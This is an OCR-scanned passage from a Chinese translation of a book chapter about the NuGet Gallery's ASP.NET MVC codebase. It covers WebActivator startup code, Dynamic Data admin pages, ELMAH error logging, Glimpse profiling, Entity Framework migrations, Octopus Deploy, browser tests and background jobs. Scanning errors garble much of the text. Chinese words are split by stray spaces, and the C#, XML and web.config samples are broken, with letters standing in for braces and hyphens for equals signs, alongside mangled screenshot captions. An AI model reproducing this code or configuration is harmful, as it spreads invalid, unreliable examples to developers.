如 果 需 要 更 详细 地 了 解 WebActivator, 笔者 推荐 David Ebbo 的 博客 , 网 址 是 http:/blogs.msdn. 

com/b/davidebb/archive/2010/10/11/light-up-your-nupacks-with-startup-code-and-webactivator.aspx o 
NuGet Gallery Website 项 目 包 含 一 个 App_Start 文 件 夹 。 依 赖 于 WebActivator 的 启动 代码 通 

常 就 放 在 这 个 文件 夹 中 。 程 序 清单 17-1 是 一 个 示例 代码 文件 ， 演 示 了 如 何 使 用 WebActivator 


来 运行 启动 及 关闭 代码 。 
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[assembly: WebActivator.PreApplicationStartMethod( 
typeof (SomeNamespace.AppActivator), "PreStart")] 
[assembly: WebActivator.PostApplicationStartMethod( 
typeof(SomeNamespace.AppActivator), "PostStart")] 
[assembly: WebActivator.ApplicationShutdownMethodAttribute ( 


typeof(SomeNamespace.AppActivator), "Stop")] 


namespace SomeNamespace 
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t 
public static class AppActivator 
t 
public static void PreStart() 
t 
// Code that runs before Application Start. 
H 
public static void PostStart() 
t 
// Code that runs after Application Start. 
H 
public static void Stop() 
t 
// Code that runs when the application is shutting down. 
} 
} 
} 


Website 项 目 文件 中 的 AppActivator.cs 包 含 启动 代码 ， 这 些 启动 代码 配置 了 许多 NuGet 
Gallery 依 赖 的 服务 , 比如 性 能 分 析 (profiling)、 迁 移 、 后 台 任 务 和 我 们 搜索 的 索引 (Lucene.NET)。 
上 面 是 一 个 很 好 的 示例 ， 演 示 了 如 何 使 用 WebActivator 在 代码 中 配置 启动 服务 。 


17.3 ASP.NET 动 态 数据 


ASPNET 动 态 数据 是 一 个 经 常 被 ASPNET MVC 开 发 人 员 忽 略 的 特征 , 因为 它 是 一 个 Web 
Forms 特 征 。 事 实 上 ，ASPNET 动 态 数据 建立 在 Web Forms 基 础 之 上 , 但 它 只 是 一 个 实现 细节 。 
ASP.NET MVC 和 Web Forms 都 是 ASPNET 应 用 程序 ， 在 开发 生产 中 ， 它 们 可 以 混合 使 用 。 

对 于 NuGet Gallery， 我 们 使 用 动态 数据 作为 一 种 快速 方法 来 构建 基 架 管理 界面 ， 这 样 就 
可 以 通过 浏览 器 编辑 数据 库 中 的 数据 。 最 后 ， 我 们 希望 构建 一 个 合适 的 管理 节 来 管理 库 
(gallery), 动态 数据 在 关键 部 分 起 了 很 大 作用 。 因 为 这 是 一 个 管理 页 面 ， 所 以 用 户 界面 细节 对 
我 们 来 说 并 不 重要 ， 不 过 如 果 我 们 想 建立 一 个 漂亮 的 用 户 界面 的 话 ， 动 态 数据 肯定 是 可 以 自 
定义 的 。 

要 查看 网 站 中 的 管理 页 面 ， 我 们 需要 一 个 管理 员 账 户 。 执 行 下 面 的 步骤 : 

(1) 将 Website 项 目 设 为 启动 项 目 ， 并 按 Ctrl+F5 快 捷 键 在 浏览 器 中 启动 项 目 。 

(2) 单 击 页 面 顶部 的 Register | Sign Im 链接 ， 注 册 一 个 用 户 。 

(3) 把 用 户 账户 添加 到 Admins 角 色 中 。 为 此 ， 需 要 添加 到 UserRoles 表 的 一 个 链接 。 方 法 
有 两 种 : 一 是 手动 完成 ， 即 在 Server Explorer 中 右 击 UserRoles 表 ， 选 择 Show Table Data， 然 后 
添加 一 行 ， 对 应 的 角色 列 的 值 为 1， 二 是 对 NuGet Gallery 数 据 库 运行 下 面 的 脚本 : 


insert into UserRoles(UserKey, RoleKey) values (1,1) 


(4) 现在 ， 可 以 把 /Admin 添 加 到 URL 中 ， 以 访问 站 点 的 管理 页 面 。 看 到 的 管理 界面 如 图 
17-4 所 示 。 

(5) 单 击 Database Administration 链 接 ， 可 以 看 到 一 个 列表 ， 其 中 包含 了 数据 库 中 的 每 个 
表 , 如 图 17-5 所 示 。 从 技术 上 讲 , 并 不 是 每 个 表 都 会 被 列 出 来 , 列 出 的 只 是 与 Entity Framework 
实体 对 应 的 那些 。 
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(6) 单 击 Roles 链 接 会 显示 Roles 表 的 内 容 ， 其 中 现在 应 该 包含 一 个 角色 (管理 员 ) 和 一 个 用 
户 (就 是 我 们 自己 )， 如 图 17-6 所 示 。 


Edit Delete Details | Admins | jongalloway@nuget.org | 


图 17-6 


警告 在 EF6 和 MVC5 中 并 不 容易 设置 动态 数据 。 向 现 有 的 ASPNET MVC 
应 用 程序 添加 动态 数据 需要 做 不 少 工作 ， 对 于 EF6 尤 其 如 此 ， 所 以 本 书 中 不 再 讨 
论 相 关内 容 。 不 过 , 使 用 一 个 示例 动态 数据 应 用 程序 和 NuGet Gallery 代 码 作为 指 


导 ， 是 能 够 理解 具体 做 法 的 。 当 然 ， 更 简单 的 做 法 是 创建 一 个 平行 的 动态 数据 
网 站 (使 用 新 的 Microsoft.AspNet.DynamicData.EFProvider 包 来 支持 EF6)， 并 使 其 
指向 同一 个 数据 库 。 


174 ”异常 日 志 


当 创建 Web 应 用 程序 时 ，ELMAH 是 笔者 推荐 安装 的 第 一 个 包 。NuGet 首 次 发 布 时 ， 笔 者 
做 的 每 次 NuGet 演 讲 (以 及 几乎 所 有 关于 NuGet 的 其 他 演示 文稿 ) 都 有 一 个 安装 ELMAH 包 的 示 
范 .ELMAH 是 错误 日 志 记录 模块 和 处 理 程序 (Error Logging Module and Handler) 的 英文 首 字母 
缩写 。 它 能 够 记录 应 用 程序 中 出 现 的 所 有 未 处 理 异 常 ， 并 在 日 志 中 保存 这 些 未 处 理 异 常 。 此 
外 ，ELMAH 还 提供 了 用 户 界面 ， 并 以 简明 的 格式 列举 日 志 中 的 错误 ， 维 护 我 们 在 可 怕 的 黄 
屏 错 误 (Yellow Screen of Death) 上 看 到 的 详细 信息 。 

为 保持 简单 , 大 部 分 的 ELMAH 示 例 都 是 演示 安装 主要 的 elmah 包 。elmah 包 中 包含 了 一 些 
确保 ELMAH 使 用 内 存 数据 库 运 行 的 配置 ， 同 时 它 还 依赖 于 elmah.corelibrary 包 。 

只 安装 elmah 包 对 于 演示 程序 来 说 足够 了 , 但 在 真实 网 站 中 这 些 是 远 远 不 够 的 , 因为 这 样 
只 是 使 得 异常 日 志 存储 在 了 内 存 中 ， 如 果 应 用 程序 重新 启动 ， 日 志 就 会 消失 。 幸 运 的 是 ， 
ELMAH 包 含 了 针对 大 多 数 主要 数据 库 厂商 的 包 ， 此 外 ， 还 包含 了 一 个 把 日 志 存 储 在 XMI 文 
件 中 的 包 。 

运行 在 开发 环境 下 时 ，NuGet Gallery 使 用 SQL Server 作 为 数据 库 ， 因 此 我 们 需要 安装 
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elmah.sqlserver 包 ， 注 意 在 安装 过 程 中 一 些 配置 需要 手动 设置 。 当 把 elmah.sqlserver 包 安装 到 
我 们 的 项 目 中 时 ， 会 看 到 项 目的 App_ Readme 文 件 夹 下 添加 了 一 个 Elmah.SqlServer sql 脚 本 。 
我 们 需要 对 SQL Server 数 据 库 执行 这 个 脚本 ， 以 便 创建 ELMAH 需 要 的 表 和 存储 过 程 。 
对 于 NuGet Gallery, 我 们 会 删除 App_Readme 文 件 夹 , 但 我 们 可 以 在 项 目 相 对 于 解决 方案 
根 目录 的 路 径 packagesvelmah.sqlserver 1.2\contentApp_ Readme 中 找到 Elmah.SqlServersql 脚 本 。 
在 生产 环境 下 ，ELMAH 会 把 错误 日 志 记录 到 Azure Tables Storage， 而 不 是 SQL Server 数 
d HE. SEE Azure Table Storage 日 志 记 录 的 代码 包含 在 类 NuGetGalleryInfrastructure. 
TableErrorLog 中 。 
默认 情况 下 ， 只 能 从 本 地 主机 访问 ELMAH。 这 是 一 个 重要 的 安全 预防 措施 ， 因 为 访问 
ELMAH 日 志 的 任何 人 都 可 能 劫持 我 们 任意 用 户 的 会 话 。 如 果 想 了 解 详情 ， 请 参阅 博客 文章 : 
www.troyhunt.com/2012/01/aspnet-sesslon-hijacking-with-google.html。 
远程 访问 异常 日 志 可 能 是 我 们 首选 ELMAH 的 一 个 原因 。 不 必 担 心 ， 实 现 远程 访问 只 需 
要 一 些 简 单 的 配置 。 首 先 ， 应 该 访问 的 用 户 或 角色 可 以 安全 访问 elmah.axd。 
NuGet Gallery 的 web.config 文 件 中 有 这 样 的 一 个 例子 。 我 们 只 限制 Admins 角 色 成 员 能 够 
访问 。 
«location path="elmah .axd"> 
«system.web» 
«httpHandlers» 
«add verb-"POST,GET,HEAD" path-"elmah.axd" 
type-"Elmah.ErrorLogPageFactory, Elmah" /» 
«/httpHandlers» 
«authorization» 
«allow roles-"Admins" /» 
«deny users-"*" /> 
«/authorization» 
«/system.web» 
«system.webServer» 
«handlers» 
«add name-"Elmah" path-"elmah.axd" verb-"POST,GET,HEAD" 


type-"Elmah.ErrorLogPageFactory, Elmah" preCondition- 
"integratedMode" /» 


X/handlers» 
«/system.webServer» 
«/location» 
安全 访问 elmah.axd 后 ， 把 security 元 素 的 allowRemoteAccess 特 性 修改 为 tue， 启 动 远程 访 
问 。 


«security allowRemoteAccess-"true"» 


现在 可 以 访问 网 站 的 /elmah.axd， 查 看 未 处 理 的 异常 。 如 果 仍 然 不 能 访问 elmah.axd， 请 
确保 按照 前 面 的 介绍 把 用 户 添加 到 Admins 角 色 。 

通过 在 web.config 中 修改 处 理 程序 的 路 径 , 可 以 改变 错误 的 显示 位 置 。 对 于 NuGet 
错误 显示 在 /Admin/Errors.axd 中 。 浏览 到 该 链接 (或 者 单 击 Admin 页 面 中 的 Error Logs 链 接 ) 会 
示 日 志 视 图 ， 如 图 17-7 所 示 。 
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€ o FTE 


is I WebSites Syncup Status B Loading.. B + Add to Delicious E) RSVP B Squit 


Error Log for on WORK 
[ nss rero | wes oest | ooweoanioa | wes (aour S| 


Errors 1 to 4 of total 4 (page 1 of 1). Start with 10, 15, 20, 25, 30, S0 or 100 errors per page. 


WORK 400 Http A petertishy dangerova Requost.Path vake was detected frora the dient 5/16/2014 12:40 AM 
Details.. 


WORK 500 HttpAntiForgery The provided anti-forgery token was meant for a different claims-based S/15/2014 5:01 PM 
user than the current user. Details.. 
WORK 500 Sql The DELETE statement colli with tha REFERENCE constraint: 5/15/2014 4:59 PM 
FK occurred in database 
"NGetGalery" toble doo UseiRoles column "Rolekey The statement 
. Details 


"WORK 500 HttpAntiForgery The provided anti-forgery token was meant for a different claims-based S/15/2014 3:54 PM. 
user than the current user. Details - 


Powered by ELMAH, version 1.2.14706.955. Copyright (c) 2004, Atif Aziz. All rights reser nder Apache License, Version 2.0. 
Server date io Friday, 16 May 2614. Server time is 00:41:42, Al dates and times es dapleyed are n e Pace Dayight Time zone. Tha log ia 
provided by the Microsoft SQL rror Log. 


图 17-7 


17.5 性 能 分 析 


NuGet Gallery 使 用 Glimpse (http://getglimpse.com) 进 行 性 能 分 析 。 安装 并 正确 配置 Glimpse 
后 ， 当 在 本 地 主机 上 运行 网 站 或 者 作为 管理 员 登 录 时 ， 网 站 每 个 页 面 的 底部 都 会 被 覆盖 一 个 
小 条 ， 如 图 17-8 所 示 。 


[- Bue D- 6 | Boe Gate pend Pn. = 
Te + Addio Dcos FIP E) st 


2. Verity Details 


will be up 


图 17-8 


Glimpse 平 视 显 示 界 面 以 简洁 的 格式 显示 了 性 能 信息 。 在 每 个 标签 (HTIP、Host 和 Ajax) 上 悬 
停 鼠 标 ， 会 展开 对 应 标签 ， 显 示 更 多 信息 。 例 如 ， 在 Host 标 签 上 悬 停 鼠 标 会 显示 关于 服务 器 端 操 
作 的 更 多 信息 ， 如 图 17-9 所 示 。 

但 这 只 是 平视 显示 界面 能 够 展现 的 信息 。 要 想 真 正 看 到 Glimpse 的 强大 功能 ， 可 以 单 
幕 右 下 角 的 “g” 图 标 ， 如 图 17-10 所 示 。 


屏 


HU 
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2 Verity Details 


图 17-9 


Upload Package 


Upload Your Package 


2. Verity Details 


图 17-10 


这 会 展开 Glimpse 面 板 ， 显 示 关 于 请 求 的 更 详细 的 信息 。 单 击 Timeline 标 签 ， 会 显示 请 求 
的 每 个 步骤 的 详细 用 时 信息 ， 如 图 17-11 所 示 。 


图 17-11 


Timeline 标 签 中 的 详细 信息 会 让 我 们 想起 在 浏览 器 开发 工具 中 习惯 看 到 的 时 间 信息 ， 但 
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是 要 记 住 ， 这 里 的 时 间 信 息 包括 服务 器 端的 信息 。 对 于 生产 环境 中 的 每 个 页 面 请 求 ， 都 有 这 
种 详细 的 性 能 信息 可 用 ， 这 是 一 种 强大 的 功能 ( 记 住 ， 只 能 用 于 管理 员 用 户 )。 

使 用 了 Entity Framework( 一 种 ORM) 的 代码 使 得 我 们 很 难 精 确 知道 生成 并 对 数据 库 运行 
了 什么 SQL 脚本 。SQL 标 签 提供 了 这 些 信 息 ， 如 图 17-12 所 示 。 


图 17-12 


Routes 标 签 对 于 MVC 应 用 程序 十 分 有 用 。 它 显示 了 完整 的 路 由 表 ， 每 个 路 由 是 否 匹 配 ， 


以 及 路 由 值 。 

Glimpse 团 队 付 出 了 巨大 努力 ， 让 Glimpse 安 装 和 使 用 起 来 极其 简单 。 对 于 使 用 EF6 的 
MVC5 应 用 程序 ， 只 需要 安装 Glimpse.MVC5 和 Glimpse.EF6 包 即 可 。 

在 项 目 中 安装 了 Glimpse 以 后 ， 就 可 以 在 本 地 主机 中 开始 使 用 ,但 是 对 于 生产 环境 ,需要 
显 式 启用 Glimpse。Glimpse 网 站 做 的 极 好 , 所 以 关于 如 何 为 远程 使 用 来 启用 Glimpse( 默 认 是 保 
护 的 ， 不 能 远程 使 用 ) 以 及 如 何 进一步 配置 Glimpse 的 更 多 信息 ， 建 议 访问 Glimpse 的 网 站 
http://getglimpse.com/Docs/#download。 

虽然 Glimpse 可 以 简单 地 设置 并 使 用 ， 但 是 也 可 以 详细 地 显 式 配置 其 行为 。 要 想 了 解 
NuGet Gallery 如 何 配 置 Glimpse， 请 查看 NuGetGallery.Diagnostics.GlimpseRuntimePolicy 类 。 


17.6 数据 访问 


NuGet Gallery 使 用 “Code First” 方 法 ， 同 时 ，Entity Framework 5 依赖 于 SQL Azure 数 据 
库 运 行 。 当 在 本 地 运行 代码 时 ， 代 码 会 依赖 于 一 个 LocalDB 实 例 运 行 。 

Code First 基 于 大 量 的 约定 ， 默 认 情况 下 需要 的 配置 极 少 。 当 然 ， 开 发 人 员 往 往 倾 向 于 根 
据 自己 的 个 人 偏好 自 定 义 接触 到 的 每 项 设置 ，NuGet 团 队 也 是 如 此 。 存 在 一 些 约定 ， 我 们 可 
以 用 自 定义 的 配置 来 替换 。 

EntitiesContext 类 包含 我 们 对 Entity Framework Code First 自 定义 的 配置 。 例 如 ， 下 面 的 代 
码 片 段 把 Key 属 性 配置 成 为 User 类 型 的 主键 。 如 果 属 性 名 称 是 I4， 或 者 Key 属 性 应 用 了 
KeyAttribute， 这 行 代码 就 不 需要 了 。 


modelBuilder.Entity«User»().HasKey(u => u.Key); 
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这 个 约定 的 一 个 例外 是 WorkItem 类 ， 因 为 它 来 自 于 另 一 个 类 库 。 
所 有 的 Code First 实 体 类 都 放 在 Entities 文 件 夹 中 .每 个 实体 都 实现 了 自 定义 的 IEntity 接 口 。 


接口 中 包含 单个 属性 一 一 Key。 


NuGet Gallery 不 能 从 DbContext 派 生 类 中 直接 访问 数据 库 。 但 是 所 有 数据 都 可 以 通过 


IEntityRepository<T> 接 口 访问 。 


public interface IEntityRepository«T» where T : 


t 
void CommitChanges(); 
void DeleteOnCommit(T entity); 
T Get(int key); 
IQueryablecT» GetAll(); 
int InsertOnCommit(T entity); 
) 


class, IEntity, new() 


这 个 接口 实现 使 得 服务 的 单元 测试 编写 变 得 极其 简单 。 例 如 ，UserService 类 的 一 个 构造 
函数 参数 是 IEntityRepository<User>。 在 单元 测试 中 ,我 们 可 以 简单 地 传递 一 个 该 接口 的 模拟 


实现 。 

但 在 现实 应 用 程序 中 ， 我 们 会 传递 一 个 具体 
的 EntityRepository<User>。 这 些 我 们 可 以 通过 使 
用 Ninject 的 依赖 注入 (本 章 后 面 会 介绍 ) 来 实现 。 
所 有 Ninject 绑 定 都 放 在 Container- Bindings 类 中 。 


17.7 ”EF 基于 代码 迁移 


在 应 用 程序 中 ， 改 变 共享 数据 库 模式 是 一 个 
极 大 挑战 。 在 过 去 ， 我 们 会 编写 SQL 改 变 脚 本 ， 
并 把 编写 的 这 些 脚本 签 入 代码 ， 然 后 告诉 每 个 人 
他 们 需要 运行 的 脚本 。 此 外 ， 我 们 还 需要 大 量 的 
敌 记 来 记录 ， 当 部 署 应 用 程序 的 下 一 个 版 本 时 ， 
需要 基于 生产 数据 库 运行 的 脚本 。 

EF 基于 代码 迁移 (EF Code-Based Migrations) 

是 一 个 代码 驱动 的 、 更 改 数据 库 的 结构 化 方式 ， 
包含 在 Entity Framework 4.3 及 其 后 续 版 本 中 。 

虽然 这 里 没有 涵盖 迁移 的 所 有 详细 内 容 ， 但 
会 介绍 我 们 利用 的 几 种 迁移 方式 。 展开 Migrations 
文件 夹 会 看 到 NuGet Gallery 中 包含 的 迁移 列表 ， 
如 图 17-13 所 示 。 迁 移 的 名 称 有 一 个 时 间 惟 前 绥 ， 
这 样 可 以 确保 它们 按照 顺序 执行 。 

显然 ， 名 为 201110060711357 ”Initial.cs 的 迁 
移 是 开端 。 它 创建 了 初始 的 表 集 。 此 后 ， 当 我 们 
开发 的 网 站 发 生 改变 时 ， 每 个 迁移 都 会 应 用 模式 


à 0-289 +|} 


Solution Explorer 


NuGetGallery » NuGetGallery-master (Ctrl« »* 


P S Hepes 
» Infrastructure 


© Migrations 


» 
b 


» 
» 
» 
» 
» 
» 
» 

b. 


ee 201110060711357 Jnitial.cs 
Ch 201110102157002 PrerelenseChanges cs. 

cn 201110180052097 GallerySettings.cs. 

(€* 201110230649210, PackageOwnerequests.cs 

ee 201111022024584 PackageDependencyVersionSpec.cs 
C 201111022051010 PackageReleazeNctes.cs 

C> 201111000239544 ListPackagesindees.cs 

cn 201111080816426 DisplayPackagelndexes.cs 

C> 201111081900453 MyPackagesindexes.cs 

C 20111115072916? AddSmtpPassword.cs 

/€* 201111222338036_GalleryOwnerEmailSettings.cs 

C> 201201031925005 AddPasswordHash.cs 

C> 201203180016174 CuratedFeeds.cs. 

> 201203180320147 ChangeCuratedFeedidToName cs 

C> 201203182132476 CuratedPackages.cs 

C> 201205172325056_FrameworkName.cs 

C 201206131919241 AddTargetFxToDependencies.cs 

C> 201206250141447 _EvecuteELMAHSqlcs 

Ch 201208171904586 Language cs 

/€* 201208222206329. ColumnLengthOfPackageTable.cs. 

C> 201208222227425 Packagelndexes.cs 

Ce 201208230640333 PackageSortinglndexes.cs 

ce 201208302051344 CreateAggregateStatisticiSP.cs 

C> 201209181743161 AggregateStalsSp.ReduxLastUpdate.cs 
ce 201210312146585. Galler/Setings TotalDownlcadCount.cs. 
C> 201210312150156 AggregateStatistics TotalDownloadCour 
€* 201211271813001 AddNuGetOperation.cs 

C> 201301180132053 RemoveWorkltems.cs. 

c 201302072118537, eea EE ation. 
ce 201302282115563 AddMinRequiredVerisonColumy 

C 201304020006512 UsesLookupOptimization, 

C> 201304091828587 Contract, UniqueCuratedPackages.cs 
C> 201304251927587 UserCreatedDate cs 

C= 201306031734581. WidenstatisticsOpesationColumn.cs 
C> 201306031754328 SupportNewClientHeaders.cs 

ce 201300051913351 EditableMetadata cs 

ce 201308292200027 Package astEditedTimestamp.cs 


C 201309172217450 CredentialsTable.cs 
© 201310281909048 PackageStatistics.cs 

C 201310301757446 RemoveOldCredentialColumns.cs 
C 201310301947399 AddCredentialDescriptionColumn.cs 
C 201311261928187 NulityOldColumns.cs 

Œ MigrationsConfiguration.cs 

€* SqResourceMigration.cs 


图 17-13 
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改变 。 
使 用 NuGet Package Manager Console 创 建 迁移 。 例 如 ， 假 设 我 们 在 User 类 中 有 一 个 Age 属 
性 。 我 们 可 以 打开 Package Manager Console， 运 行 下 面 的 命令 : 


Add-Migration AddAgeToUser 


命令 Add-Migration 可 以 添加 一 个 新 迁移 , AddAgeToUser 是 迁移 名 称 。 笔 者 尝试 挑选 一 些 
描述 内 容 ， 以 便 能 记得 迁移 做 哪些 改变 。 这 样 会 生成 一 个 名 为 
201404292258426_AddAgeToUser.cs 的 文件 ， 迁 移 代 码 如 程序 清单 17-2 所 示 。 


程序 清单 17-2 201404292258426_AddAgeToUser.cs 迁 移 


namespace NuGetGallery.Migrations 
{ 
using System.Data.Entity.Migrations; 
public partial class AddAgeToUser : DbMigration 
{ 
public override void Up() 
t 
AddColumn("Users", "Age", c => c.Int(nullable: false)); 
) 
public override void Down() 
T 
DropColumn("Users", "Age"); 
} 
} 
} 


太 好 了 ， 竞 然 可 以 检测 实体 的 改变 ， 并 为 我 们 创建 合适 的 迁移 。 现 在 如 果 需 要 自 定义 的 
话 ， 可 以 自由 地 编辑 迁移 ， 但 在 大 多 数 情况 下 我 们 没 必要 跟踪 开发 的 每 一 点 变化 。 当 然 ， 也 
存在 一 些 修改 ,不 能 自动 地 为 它们 创建 迁移 。 例如， 我 们 有 一 个 Name 属 性 , 现在 决定 把 它 分 
成 两 个 属性 一 一 FirstName 和 LastName， 此 时 就 需要 自己 编写 迁移 代码 。 但 对 于 简单 的 改变 ， 
这 的 确 很 好 。 

当 开 发 代码 时 ， 其 他 人 可 能 也 在 代码 中 添加 了 一 些 迁移 。 通 常情 况 下 ， 我 们 会 执行 
Update-Database 命 令 ， 运 行 所 有 尚未 应 用 到 本 地 数据 库 的 迁移 。 同 样 ， 当 我 们 部 署 应 用 程序 
时 ， 我 们 需要 运行 针对 这 个 产品 网 站 的 所 有 迁移 。 

以 前 ， 在 每 次 运行 网 站 时 ，NuGet Gallery 代 码 库 自 动 运行 迁移 。 这 是 使 用 AppActivatorcs 中 
的 DbMigratorPostStart 方 法 实现 的 。DbMigratorPostStart 方 法 使 用 下 面 两 行 代码 来 实现 自动 迁 
移 和 自动 运行 : 

var dbMigrator = new DbMigrator (new MigrationsConfiguration()); 

dbMigrator.Update(); 

MigrationsConfiguration 类 是 DbMigrationsConfiguration 类 的 派生 类 , 其 中 包含 对 Code First 
JMigrations 的 自 定义 配置 。 重 写 在 迁移 执行 之 后 运行 的 Seed 方 法 来 创建 初始 种 子 数据 。 在 尝试 
创建 之 前 ,确保 Seed 方 法 检查 数据 的 存在 .例如 , NuGet Gallery 重 写 Seed 方 法 , 并 添加 “Admins” 
角色 (如 果 它 不 存在 的 话 )。 

逐渐 地 ，NuGet Gallery 团 队 从 在 应 用 程序 启动 时 运行 迁移 改 为 了 一 个 受 控 的 手动 过 程 。 
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现在 使 用 “galops”(gallery operations 的 缩写 ) 控 制 台 运 行 迁移 。 要 想 查看 执行 迁移 的 代码 ， 可 
以 观察 NuGetGalleryOperations 项 目 中 的 RunMigrationsTask 类 。 这 个 任务 有 两 个 选项 : 一 个 应 
用 迁移 ， 另 一 个 生成 要 直接 应 用 到 数据 库 的 SQL 迁移 脚本 。 


17.8 使 用 Octopus Deploy 进 行 部 署 


对 于 NET 来 说 ，Octopus 是 一 个 友好 的 、 基 于 约定 的 自动 部 署 系统 。 不 仅 如 此 ，Octopus 
Deploy 还 使 用 NuGet 来 打包 我 们 的 部 署 。 

整体 工作 流 如 下 所 示 : 

(1) 签 入 代码 后 ， 持 续集 成 (CI，continuous integration) 服 务 器 会 把 代码 打包 成 NuGet 包 。 
本 例 中 ，CI 服 务 器 运行 的 是 TeamCity。 

(2) 这 些 NuGet 包 被 添加 到 NuGet 源 中 。 

(3) 当 发 布 管理 器 想 要 发 布 一 个 版 本 时 ， 会 告诉 Octopus 开 始 工作 。 

(4) Octopus 会 把 NuGet 包 转换 成 程序 集 ， 并 发 送 给 目标 服务 器 上 运行 的 一 个 Windows 服 务 
(叫做 Tentacle)。 

(5) Tentacle 部 署 并 配置 代码 。 

NuGet Gallery 团 队 使 用 这 些 代码 把 三 种 服务 器 类 型 (Gallery、Search Service Il Work 
Service) 部 署 到 三 种 环境 (dev、int 和 prod) 中 。 实现 生产 部 署 的 方式 是 : 首先 部 署 到 内 部 服务 器 ， 
手动 执行 检查 ， 然 后 使 用 虚拟 亿 交 换 将 生产 环境 的 流量 指向 更 新 后 的 服务 器 。 

进行 受信 任 、 可 重复 的 部 署 十 分 简单 ， 使 得 NuGet Gallery 团 队 能 够 从 原来 在 每 两 周 项 目 
迭代 周期 结束 时 进行 部 署 ， 改 为 频繁 的 小 规模 部 署 。 

Octopus 面 板 可 供 公共 查看 ， 如 图 17-14 所 示 ， 其 地 址 为 : https://nuget-octopus.cloudapp.net/。 


[c] https /nuget-cctopus eloudapp net sop P ~ @ C || R Dashbord - Octopus Deploy x 
a Il WebStes Syncup Status E) Loading.. B) + Add to Delicious E) RSVP E) Squit 


Dashboard Configure dashboard 
dev int prod 
3.0.21-r-master 3.0.16-r-master 3.0.16-r-master 
NuGet Search eig T2004 m 5 April 23td 2014 
2d E es | E 


3.0.38-r-master 3.0.33-r-master 3.0.33-r-master. 


NuGet V2 Gallery ay 14th 2014 


3.0.30-r-master 3.0.15-r-master 3.0.15-r-master 


ay 15th 2014 May 1st 2014 sy 2nd 2014 


NuGet Work Service 
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图 17-14 
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17.9 使 用 Fluent Automation 自 动 进行 浏览 器 测试 


除了 主 NuGet Gallery 解 决 方案 中 包含 的 基于 xUnit 的 单元 测试 项 目 以 外 , NuGet Gallery 源 还 
包含 一 套 单独 的 功能 测试 (https://github.com/NuGet/NuGetGallery/tree/master/tests)。 这 些 功 能 
测试 使 用 浏览 器 自动 化 来 测试 实际 的 最 终 用 户 的 功能 。 

这 些 功 能 测试 是 使 用 Fluent Automation 库 (当然 ， 可 以 在 NuGet 上 获得 ) 驱 动 的 。Fluent 
Automation 采 用 了 “ 流 式 ” 编 码 风格 ， 即 使 用 方法 链 来 编写 十 分 易 读 的 测试 。 作 为 一 个 例子 ， 
下 面 的 代码 是 一 个 检查 网 站 登录 页 面 的 功能 测试 方法 : 


private void LogonHelper(string page) 


t 


I. 
I. 


string registerSignIn = "a:contains('Register / Sign in')"; 


Open(UrlHelper.BaseUrl + page); 
Expect.Url(x -» x.AbsoluteUri.Contains (page)); 


string signOut - "a:contains('Sign out')"; 


string expectedUserName = "a:contains('NugetTestAccount')"; 


I 
X 
E 


Li 


XT Fluent Automation 库 的 更 多 信息 ， 请 访问 此 网 址 : http:;//fluent.stirno.com/. 


.Click (registersignIn); 
.Expect.Url(x => x.LocalPath.Contains ("LogOn")); 
.Enter(EnvironmentSettings.TestAccountName). 


In("£SignIn UserNameOrEmail"); 


.Enter(EnvironmentSettings.TestAccountPassword). 


In("£SignIn Password"); 


.Click("£signin-link"); 


.Expect.Url(x => x.AbsoluteUri.Contains (page)); 
.Expect.Count (0) .Of (registerSignIn); 
.Expect.Count (1) .Of (signOut); 
.Expect.Count (1) .Of (expectedUserName); 
.Click(signout); 


.Expect.Url(x -» x.AbsoluteUri.Contains (page)); 
.Expect.Count (1) .Of (registerSignIn); 
.Expect.Count (0) .Of (signOut) ; 
.Expect.Count (0) .Of (expectedUserName); 


17.00 ”其 他 有 用 的 NuGet 包 


正如 上 面 提 到 的 ， 经 验 教训 和 我 们 用 来 构建 NuGet Gallery 的 工具 可 以 写成 一 本 书 。 前 面 


的 章节 介绍 了 几乎 每 个 Web 应 用 程序 都 会 用 到 的 功能 ， 比 如 管理 节 、 性 能 解析 和 错误 


日 志 等 。 


本 节 快 速 介绍 一 些 在 NuGet Gallery 中 使 用 的 包 ， 虽 然 大 部 分 应 用 程序 都 不 需要 这 些 包 ， 
但 当 我 们 需要 的 时 候 ， 它 们 却 非常 有 用 。 每 一 小 节 以 安装 包 的 命令 开始 。 
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17.10.1 WebBackgrounder 


Install-Package WebBackgrounder 


WebBackgrounder(http://nuget.org/packages/WebBackgrounder) & n] UJ 7z 4 Hh iZ fT ASPNET M 
程序 中 反复 出 现在 后 台 的 任务 。ASPNET 和 IIS 随时 都 可 以 自由 地 终止 我 们 应 用 程序 的 
AppDomain。ASPNET 提 供 机 制 来 通知 代码 终止 时 间 。WebBackgrounder 利 用 这 一 点 可 以 尝试 
为 那些 反复 出 现 的 运行 任务 安全 地 运行 一 个 后 台 定时 器 。 

在 进度 中 ，WebBackgrounder 是 一 个 非常 早期 的 工作 , 但 NuGet Gallery 使 用 它 来 定期 更 新 
下 载 统计 ， 更 新 LuceneNET 索 引 。 正 如 我 们 期 望 的 ，WebBackgrounder 在 AppActivator 中 ， 通 
过 下 面 两 个 方法 配置 

private static void BackgroundJobsPostStart () 

{ 


Var jobs = new IJob[] { 
new UpdateStatisticsJob (TimeSpan.FromSeconds (10), 
() => new EntitiesContext(), timeout: TimeSpan.FromMinutes(5)), 
new WorkItemCleanupJob (TimeSpan.FromDays (1), 
() => new EntitiesContext(), timeout: TimeSpan.FromDays(4)), 
new LuceneIndexingJob (TimeSpan.FromMinutes (10), 
timeout: TimeSpan.FromMinutes(2)), 
}; 
var jobCoordinator = new WebFarmJobCoordinator (new 
EntityWorkItemRepository 
( 
() => new EntitiesContext ())); 
_jobManager = new JobManager(jobs, jobCoordinator); 
. jobManager.Fail (e => ErrorLog.GetDefault (null).Log(new Error(e))); 
. jobManager.Start(); 
) 


private static void BackgroundJobsStop() 

i . jobManager.Dispose(); 

} 

第 一 个 方法 BackgroundJobsPostStart 创 建 一 个 先前 运行 作业 的 数组 。 每 个 作业 包含 一 个 时 
间 间 隔 ， 表 示 它 们 隔 多 长 时 间 运 行 一 次 。 例 如 ， 我 们 每 隔 10 秒 更 新 下 载 数量 统计 。 

接 下 来 的 代码 创建 了 一 个 任务 协调 器 。 如 果 应 用 程序 只 是 运行 在 一 台 服 务 器 上 ， 我 们 只 
需要 使 用 SingleServerJobCoordinator。 由 于 NuGet Gallery 运 行 在 Windows Azure 上 ， 因 此 ， 它 
是 一 个 非常 有 效 的 Web Farm, 这 里 Web Farm 要 求 WebFarmJobCoordinator 确 保 同 样 的 任务 不 能 
